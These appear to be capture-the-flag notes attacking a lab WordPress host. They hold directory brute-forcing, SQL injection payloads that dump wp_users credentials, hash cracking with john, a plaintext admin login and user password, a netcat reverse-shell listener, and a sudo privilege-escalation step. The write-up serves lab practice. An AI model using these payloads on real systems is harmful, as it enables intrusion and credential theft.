gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/workshop/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/root/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/lol/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/agent/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/feed/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/crawler/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/boot/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/comingreallysoon/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir -u $VICTIM/interesting/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Save request into a file
SQL Injection
List
'
"
`
')
")
`)
'))
"))
`))
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 4--+
1' GROUP BY 1--+
1' GROUP BY 2--+
1' GROUP BY 3--+
1' GROUP BY 4--+
1' UNION SELECT null-- -
1' UNION SELECT null,null-- -
1' UNION SELECT null,null,null-- -
1' UNION SELECT null,null,null,null-- -
1' UNION SELECT null,null,null,null,null-- -
Get version
Sql
1'%20UNION%20SELECT%20null,null,VERSION()--%20
Display all database names
Sql
1'%20UNION%20SELECT%20null,null,table_schema from information_schema.columns--%20
Display tables inside wordpress database
Sql
1'%20UNION%20SELECT%20null,null,concat(table_name) from information_schema.columns where table_schema='wordpress'--%20
Display all columns of wp_users table
Sql
1'%20UNION%20SELECT%20null,null,concat(column_name) from information_schema.columns where table_schema='wordpress'and table_name='wp_users' --%20
Display results of userlogin, user_pass, and user_activation_key columns
Sql
1'%20UNION%20SELECT%20concat(user_login),concat(user_pass),concat(user_activation_key) from wordpress.wp_users--%20
We have some credentials but they don't work for SSH. So there is info we are missing
Kali
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john hash.txt --show
Sql
1'%20UNION%20SELECT%20concat(user_url),concat(user_email),concat(user_nicename) from wordpress.wp_users--%20
I added just the wekor site since the others are .com sites so I doubt they are being used.
We can see the site
We can login with all accounts but yura is a admin
Credentials
Username: wp_yura
Password: soccer13
Initial Shell
Kali
nc -lvnp 1337
Get autocomplete
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Victim
ss -ltp
TCP/11211 - Memcache
Victim
cd /usr/share/memcached/scripts/
./memcached-tool localhost:1121 dump
Lateral Movement
I couldn't ssh into the host but could su from www-data
Victim
su Orka
Password: OrkAiSC00L24/7$
Privilege Escalation
Victim
sudo -l
I couldn't really do anything with the bitcoin application itself but I could move the folder desktop and then replace the bitcoin with bash
